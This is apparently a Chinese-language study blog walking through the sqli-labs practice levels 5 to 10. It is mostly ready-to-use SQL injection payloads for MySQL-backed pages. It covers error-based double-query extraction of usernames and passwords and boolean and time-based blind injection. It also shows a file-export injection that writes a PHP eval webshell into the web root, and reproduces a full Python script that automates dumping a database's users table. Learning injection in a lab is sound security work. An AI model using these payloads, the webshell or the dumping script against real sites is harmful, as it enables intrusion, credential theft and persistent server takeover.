经常会犯的错误:
1.在hackbar里面忘记用%23替代#
2.在用下一条语句的时候忘记更改limit的值导致结果显示不出来
3.双注入里面的语句忘记加()
日志是我后来想到发的,前面几关也都基础简单的,giantbranch大佬写的挺好的很详细,我也是按他的一步步学习来的,然后在里面增加自己的知识点和内容,对他进行补充和说明
他的文章地址:javascript:void(0)
less 5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)
先通过简单的判断发现是3个字段,然后搜索数据库的名称 发现页面没东西显示出来
http://10.10.10.145:8081‘union select 1,2,database %23
会发现只有这几个单词出现,没有其他的消息出现 再看源码
本身就没有输出,所以想办法让它输出我们需要的信息
有一个研究人员发现,一个聚合函数比如count函数后面如果使用分组语句的话就会把查询的结果以一部分的错误显示出来,因为有随机性要多刷新几次
那我们就用count(*),返回的是总行数
让我们构造这样的语句
http://10.10.10.145:8081/Less-5/index.php?id=1' union select count(*),2,concat((select database()),floor(rand()*2)) as a from information_schema.tables group by a %23
=====================================================
①1和2的位置至少要有一个count(*)
②concat()就是把多个字符串连接成一个字符,里面的查询语句必须要用小括号括起来,前面可以家任何字符来帮助你区分出你要的信息和错误的信息,但是floor(rand()*2)这个是必须要有的,否则不会起效果
③as a就是把前面的查询结果起一个别名,名字叫做a,你也可以不加as 直接在后面加a,但是我不推荐你这么做
=====================================================
然后开始查表
http://10.10.10.145:8081/Less-5/index.php?id=1' union select count(*),2,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~',floor(rand()*2)) as a from information_schema.tables group by a %23
需要配合limit 来一个个遍历,所有的注入环节都在concat里面完成
然后查列
http://10.10.10.145:8081/Less-5/index.php?id=1' union select count(*),2,concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='users'limit 2,1),'~',floor(rand()*2)) as a from information_schema.tables group by a %23
查数据
http://10.10.10.145:8081/Less-5/index.php?id=1' union select count(*),2,concat('~',(select concat_ws(char(45),username,password) from users limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a %23
less 6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)
这个题的思路跟第5题一样就是把单引号换成双引号就可以了
http://10.10.10.145:8081/Less-6/index.php?id=1"union select count(*),2,concat('~',(select concat_ws(char(45),username,password) from users limit 0,1),'~',floor(rand()*2)) as a from information_schema.tables group by a%23
less 7 GET - Dump into outfile - String (导出文件GET字符型注入)
导出文件就是用sql语句导出一个文件,我们可以导出一句话然后用菜刀连接
常用的语句:select <?php @eval($_POST['storm']);?>" into outfile "XXX\test.php后面是网站的绝对路径
路径根据系统和数据库猜测如winserver的iis默认路径是c:/inetpub/wwwroot/linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等
apache 就/var/www/htm,/var/www/html/htdocs
两个重要变量:
@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径
先爆出路径
http://10.10.10.145:8081/Less-7/index.php?id=-1')) union select 1,concat_ws(char(45),@@datadir,@@basedir),3 %23
然后就是导出文件了
然后打开
总结
1.在实验中发现爆出的那个mysql路径无法写入,就换了一个路径就可以写入
2.在输入文件绝对路径的时候‘\’需要被转义所以要用’\\’,
3.文本内容都要用单引号包括住
4.一句话里面如果还要用单引号就用双引号代替,否则会出错
less 8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)
加个引号发现,页面没有报错而且没有任何信息的输出,所以只能用盲注了。
==需要补充的额外知识======
length(str):返回str字符串的长度。
substr(str, pos, len):将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始
mid(str,pos,len):跟上面的一样,截取字符串
ascii(str):返回字符串str的最左面字符的ASCII代码值。
ord(str):同上,返回ascii码
if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0
常见的ASCII,A:65,Z:90 a:97,z:122, 0:48, 9:57
=====================
我们用and连接在写一个语句,只有and前后语句都为真结果才真,其中一个为假结果就为假
所以我们用这个语句来判断
http://10.10.10.145:8081/Less-8/index.php?id=1'and if(ascii(substr((select database()),1,1))>64, 1, 0) %23
页面正常说明数据库的第一个字母的ascii值大于64
然后用数学的二分法不断进行猜测
http://10.10.10.145:8081/Less-8/index.php?id=1' and ascii(substr((select database()),1,1)>64 %23 返回正确,大于64
http://10.10.10.145:8081/Less-8/index.php?id=1' and ascii(substr((select database()),1,1))>96 %23 返回正确,大于96
http://10.10.10.145:8081/Less-8/index.php?id=1' and ascii(substr((select database()),1,1))<123 %23 返回正确,小于123 ,区间在97-122
http://10.10.10.145:8081/Less-8/index.php?id=1' and ascii(substr((select database()),1,1))>109 %23 返回正确,大于109,区间在110-122
http://10.10.10.145:8081/Less-8/index.php?id=1'and ascii(substr((select database()),1,1))>116 %23 返回错误,所以在110-116之间
http://10.10.10.145:8081/Less-8/index.php?id=1' and ascii(substr((select database()),1,1))>112 %23 返回正确,大于112,区间在113-116之间
http://10.10.10.145:8081/Less-8/index.php?id=1' and ascii(substr((select database()),1,1))>114 %23 返回正确,大于114,间在115-116之间
http://10.10.10.145:8081/Less-8/index.php?id=1'and ascii(substr((select database()),1,1))>115 %23 返回错误,不大于115,即第一个字母的ascii为115,即字母s
最后我们用http://10.10.10.145:8081/Less-8/index.php?id=1'and ascii(substr((select database()),1,1))=115 %23 进行验证 返回正确,说明数据库的第一个字母的ascii为115
然后猜解其他的也是这样只需要把substr((select database()),1,1)的第一个1改下就好然后用二分法不断逼近这个位置字母正确的ascii值
盲注的过程比较漫长可以写脚本来执行,或者用sqlmap
这里引用下giantbranch大佬写的
# -*-coding:utf-8-*-
"""
@version:
@author: giantbranch
@file: blindsqlinjection.py
@time: 2016/5/1
"""
import urllib2
import urllib
success_str = "You are in"
getTable = "users"
index = "0"
url = "http://localhost/sqli-labs/Less-8/?id=1"
database = "database()"
selectDB = "select database()"
selectTable = "select table_name from information_schema.tables where table_schema='%s' limit %d,1"
asciiPayload = "' and ascii(substr((%s),%d,1))>=%d #"
lengthPayload = "' and length(%s)>=%d #"
selectTableCountPayload = "'and (select count(table_name) from information_schema.tables where table_schema='%s')>=%d #"
selectTableNameLengthPayloadfront = "'and (select length(table_name) from information_schema.tables where table_schema='%s' limit "
selectTableNameLengthPayloadbehind = ",1)>=%d #"
# 发送请求,根据页面的返回的判断长度的猜测结果
# string:猜测的字符串 payload:使用的payload length:猜测的长度
def getLengthResult(payload, string, length):
finalUrl = url + urllib.quote(payload % (string, length))
res = urllib2.urlopen(finalUrl)
if success_str in res.read():
return True
else:
return False
# 发送请求,根据页面的返回的判断猜测的字符是否正确
# payload:使用的payload string:猜测的字符串 pos:猜测字符串的位置 ascii:猜测的ascii
def getResult(payload, string, pos, ascii):
finalUrl = url + urllib.quote(payload % (string, pos, ascii))
res = urllib2.urlopen(finalUrl)
if success_str in res.read():
return True
else:
return False
# 注入
def inject():
# 猜数据库长度
lengthOfDBName = getLengthOfString(lengthPayload, database)
print "length of DBname: " + str(lengthOfDBName)
# 获取数据库名称
DBname = getName(asciiPayload, selectDB, lengthOfDBName)
print "current database:" + DBname
# 获取数据库中的表的个数
# print selectTableCountPayload
tableCount = getLengthOfString(selectTableCountPayload, DBname)
print "count of talbe:" + str(tableCount)
# 获取数据库中的表
for i in xrange(0,tableCount):
# 第几个表
num = str(i)
# 获取当前这个表的长度
selectTableNameLengthPayload = selectTableNameLengthPayloadfront + num + selectTableNameLengthPayloadbehind
tableNameLength = getLengthOfString(selectTableNameLengthPayload, DBname)
print "current table length:" + str(tableNameLength)
# 获取当前这个表的名字
selectTableName = selectTable%(DBname, i)
tableName = getName(asciiPayload, selectTableName ,tableNameLength)
print tableName
selectColumnCountPayload = "'and (select count(column_name) from information_schema.columns where table_schema='"+ DBname +"' and table_name='%s')>=%d #"
# print selectColumnCountPayload
# 获取指定表的列的数量
columnCount = getLengthOfString(selectColumnCountPayload, getTable)
print "table:" + getTable + " --count of column:" + str(columnCount)
# 获取该表有多少行数据
dataCountPayload = "'and (select count(*) from %s)>=%d #"
dataCount = getLengthOfString(dataCountPayload, getTable)
print "table:" + getTable + " --count of data: " + str(dataCount)
data = []
# 获取指定表中的列
for i in xrange(0,columnCount):
# 获取该列名字长度
selectColumnNameLengthPayload = "'and (select length(column_name) from information_schema.columns where table_schema='"+ DBname +"' and table_name='%s' limit "+ str(i) +",1)>=%d #"
# print selectColumnNameLengthPayload
columnNameLength = getLengthOfString(selectColumnNameLengthPayload, getTable)
print "current column length:" + str(columnNameLength)
# 获取该列的名字
selectColumn = "select column_name from information_schema.columns where table_schema='"+ DBname +"' and table_name='%s' limit %d,1"
selectColumnName = selectColumn%(getTable, i)
# print selectColumnName
columnName = getName(asciiPayload, selectColumnName ,columnNameLength)
print columnName
tmpData = []
tmpData.append(columnName)
# 获取该表的数据
for j in xrange(0,dataCount):
columnDataLengthPayload = "'and (select length("+ columnName +") from %s limit " + str(j) + ",1)>=%d #"
# print columnDataLengthPayload
columnDataLength = getLengthOfString(columnDataLengthPayload, getTable)
# print columnDataLength
selectData = "select " + columnName + " from users limit " + str(j) + ",1"
columnData = getName(asciiPayload, selectData, columnDataLength)
# print columnData
tmpData.append(columnData)
data.append(tmpData)
# print data
# 格式化输出数据
# 输出列名
tmp = ""
for i in xrange(0,len(data)):
tmp += data[i][0] + " "
print tmp
# 输出具体数据
for j in xrange(1,dataCount+1):
tmp = ""
for i in xrange(0,len(data)):
tmp += data[i][j] + " "
print tmp
# 获取字符串的长度
def getLengthOfString(payload, string):
# 猜长度
lengthLeft = 0
lengthRigth = 0
guess = 10
# 确定长度上限,每次增加5
while 1:
# 如果长度大于guess
if getLengthResult(payload, string, guess) == True:
# 猜测值增加5
guess = guess + 5
else:
lengthRigth = guess
break
# print "lengthRigth: " + str(lengthRigth)
# 二分法查长度
mid = (lengthLeft + lengthRigth) / 2
while lengthLeft < lengthRigth - 1:
# 如果长度大于等于mid
if getLengthResult(payload, string, mid) == True:
# 更新长度的左边界为mid
lengthLeft = mid
else:
# 否则就是长度小于mid
# 更新长度的右边界为mid
lengthRigth = mid
# 更新中值
mid = (lengthLeft + lengthRigth) / 2
# print lengthLeft, lengthRigth
# 因为lengthLeft当长度大于等于mid时更新为mid,而lengthRigth是当长度小于mid时更新为mid
# 所以长度区间:大于等于 lengthLeft,小于lengthRigth
# 而循环条件是 lengthLeft < lengthRigth - 1,退出循环,lengthLeft就是所求长度
# 如循环到最后一步 lengthLeft = 8, lengthRigth = 9时,循环退出,区间为8<=length<9,length就肯定等于8
return lengthLeft
# 获取名称
def getName(payload, string, lengthOfString):
# 32是空格,是第一个可显示的字符,127是delete,最后一个字符
tmp = ''
for i in xrange(1,lengthOfString+1):
left = 32
right = 127
mid = (left + right) / 2
while left < right - 1:
# 如果该字符串的第i个字符的ascii码大于等于mid
if getResult(payload, string, i, mid) == True:
# 则更新左边界
left = mid
mid = (left + right) / 2
else:
# 否则该字符串的第i个字符的ascii码小于mid
# 则更新右边界
right = mid
# 更新中值
mid = (left + right) / 2
tmp += chr(left)
# print tmp
return tmp
def main():
inject()
main()
less 9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)
这题是不管怎么样都只是显示 You are in………..
我们就用
http://localhost/sqli-labs/Less-9/?id=1' and sleep(3) %23
用and 连接sleep(3)你会发现页面要刷新要3秒,用这个来判断
http://localhost/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))>114, 0, sleep(5)) %23
http://localhost/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23
if()函数的解释请看上一关,就是如果条件成立,页面显示You are in………..,如果页面就等待5秒在刷新成功,这题感觉跟上面一题很类似的,这里把sleep()函数当作判断条件,适合那种没有任何提示信息输出,只能用sleep()控制页面的刷新情况来达到知道结果的目的。
其实也可以这样 (如果有错误信息输出的话)
http://10.10.10.145:8081/Less-9/index.php?id=1' and if(ascii(substr(database(),1,1))>114, 1,0) %23
http://10.10.10.145:8081/Less-9/index.php?id=1' and if(ascii(substr(database(),1,1))>115, 1,0) %23
if后面2个参数,1(非0)表示正常,0表示不正常,当然你也可以位置换一下
*这题其实没有输出不能这解,只是一个对自己的考验和练习
然后接下来的步骤其实跟第8题一样的
less 10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)
跟上一关一样只是把单引号换成双引号而已